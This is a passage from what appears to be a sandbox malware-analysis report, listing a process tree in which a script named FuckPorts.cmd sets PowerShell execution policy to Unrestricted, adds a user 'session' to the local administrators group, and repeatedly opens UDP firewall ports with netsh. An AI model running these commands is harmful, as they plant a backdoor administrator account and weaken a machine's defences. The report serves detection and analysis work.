    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4948
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2172
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2200
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3372
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3416
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1868
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3492
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3636
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4824
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3492
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3156
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2012
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3636
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:752
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:660
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5084
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2748
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3208
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4436
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3516
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:400
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1544
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1140
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3604
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4296
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K FuckPorts.cmd
  2⤵
  PID:2448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:2484
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:532
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3904
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2504
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2256
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4072
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1548
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    - Adds Run key to start application
    PID:2900
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4780
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:456
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1596
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1972
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1188
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4268
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4268
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2336
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1404
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3904
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1460
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2812
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2956
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:632
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4692
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    - Executes dropped EXE
    PID:2428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3132
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2068
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1672
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4948
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1456
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1184
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3492
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:660
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:940
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4000
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2284
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4368
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:660
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3136
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:676
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3964
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
